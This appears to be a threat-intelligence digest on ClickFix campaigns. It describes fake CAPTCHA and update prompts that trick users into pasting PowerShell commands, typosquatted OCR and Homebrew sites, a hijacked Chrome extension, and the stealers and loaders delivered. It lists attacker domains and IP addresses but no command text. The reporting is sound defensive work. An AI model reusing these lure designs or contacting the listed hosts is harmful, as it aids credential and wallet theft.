ClickFix Social-Engineering Technique Used to Trick Users Into Running Malware
Multiple reports highlighted ClickFix, a social-engineering technique that uses fake verification or update prompts to coerce users into manually executing attacker-supplied commands, as a recurring initial access method in recent malware activity. In the OCRFix botnet campaign, victims were lured to a typosquatted site impersonating Tesseract OCR (tesseract-ocr[.]com lookalike) via SEO poisoning and reported LLM poisoning (chatbot recommendations pointing users to the malicious site). The site presented a fake CAPTCHA that copied an obfuscated PowerShell command to the clipboard and instructed the user to paste it into PowerShell; this led to retrieval of a malicious MSI (98166e51.msi) from opsecdefcloud[.]com, after which victims were redirected to the legitimate GitHub project to reduce suspicion. The loader then queried a BNB TestNet smart contract to obtain C2 details, using EtherHiding (blockchain-hosted instructions) to make takedown and disruption more difficult.
A separate investigation described a Chrome extension supply-chain compromise of QuickLens – Search Screen with Google Lens (7,000+ users), where attackers acquired the extension and shipped an update embedding malicious scripts and elevated permissions to enable credential/crypto theft and staged payload delivery; the campaign also incorporated a ClickFix flow that masqueraded as a legitimate browser update to trick users into executing malicious code. Other items in the set covered different topics: an AiTM phishing-kit attribution case study (focused on reverse-proxy phishing infrastructure rather than ClickFix), research on Funnull/Fangneng CDN as cybercrime-enabling infrastructure and related supply-chain activity, and Zscaler reporting on Dust Specter APT targeting Iraqi government officials with password-protected RAR delivery and custom malware modules—none of which were primarily about ClickFix.
Sources
Related Stories
ClickFix Social Engineering Drives Multi-Platform Malware Delivery
Security researchers reported multiple active campaigns using **ClickFix** social engineering—fake error dialogs or verification prompts that trick users into manually running attacker-supplied commands—to bypass browser and download protections and establish an initial foothold. In one enterprise case investigated by **CERT Polska (cert.pl)**, victims were lured via compromised websites showing a fake CAPTCHA/“fix” prompt that instructed them to paste and run a **PowerShell** command via `Win+R`; the script then downloaded a dropper and enabled rapid follow-on activity that can scale to **enterprise-wide compromise**, including deployment of secondary malware such as **Latrodectus** and **Supper** for data theft, lateral movement, and potential ransomware staging. A separate ClickFix operation targeted **macOS developers** by cloning the *Homebrew* site on typosquatted infrastructure; the “install” command was subtly altered to fetch content from `raw.homabrews.org` instead of `raw.githubusercontent.com`, leading to **Cuckoo Stealer** deployment and credential harvesting via repeated password prompts using macOS Directory Services, with related domains tied to shared hosting at **`5.255.123.244`**. ClickFix was also observed as the initial execution mechanism for the resurfaced **Matanbuchus 3.0** MaaS loader, which uses deceptive copy/paste prompts and **silent MSI** execution (via `msiexec`) to deliver a new payload, **AstarionRAT**, enabling capabilities including credential theft and **SOCKS5** proxying; operators were reported to move laterally quickly (including toward domain controllers), consistent with ransomware or data-exfiltration objectives.
3 weeks ago
ClickFix Social-Engineering Technique Using Fake CAPTCHA to Trigger Manual Command Execution
A **ClickFix**-style malware campaign has been observed using **fake CAPTCHA** pages on compromised websites to trick users into **manually executing** malicious commands, enabling initial access while evading controls that focus on downloaded files. In the reported activity, victims are prompted to copy a **PowerShell** command and run it themselves; the script then downloads additional stages from attacker infrastructure (including `91.92.240.219`), verifies user interaction by checking clipboard activity, and proceeds through a multi-stage infection chain. The payload is an **information stealer** targeting data from **25+ web browsers**, cryptocurrency wallets (e.g., *MetaMask*), and enterprise VPN configurations, with checks for virtualized environments and security tooling prior to exfiltration. Separately reported threat activity in the same time window includes **UnsolicitedBooker** targeting Central Asian telecoms with phishing-delivered backdoors (**LuciDoor** and **MarsSnake**) and **APT28** running *Operation MacroMaze*, which uses weaponized Office documents and `INCLUDEPICTURE` fields pointing to `webhook[.]site` URLs as a tracking mechanism and to support follow-on macro-based payload delivery. A video-style weekly briefing also mentions an evolution of ClickFix where an initial command uses `nslookup` and parses the response for execution, but it is a multi-topic roundup rather than a primary source on the fake-CAPTCHA infostealer campaign; a malware newsletter roundup is likewise a link collection and does not add specific, corroborating details about the ClickFix CAPTCHA infostealer operation.
3 weeks ago
ClickFix Social-Engineering Lures Deliver Multi-Stage Windows Malware via Browser Extensions and Compromised WordPress Sites
Threat researchers reported continued evolution and operationalization of **ClickFix**-style social engineering, where victims are tricked into manually executing attacker-supplied commands via the Windows Run dialog. Huntress described a new variant dubbed **CrashFix**, attributed to **KongTuke**, which uses a **malicious browser extension** to display a fake “browser stopped abnormally” security warning and a bogus “scan” flow; the extension silently places a **PowerShell** command on the clipboard, disguised as a legitimate repair action, and instructs the user to paste-and-run it, leading to code execution. Rapid7 Labs separately documented a large-scale campaign in which an unidentified actor compromises legitimate **WordPress** sites to inject a ClickFix implant that impersonates a **Cloudflare human verification (CAPTCHA)** challenge. The operation has affected **250+** infected sites across **12+ countries** and delivers a **multi-stage, mostly in-memory** malware chain (obfuscated JavaScript → PowerShell stagers → in-memory loaders/shellcode) aimed at stealing **credentials and digital wallets** from Windows systems, enabling downstream financial theft and potential follow-on intrusion using harvested credentials.
1 weeks ago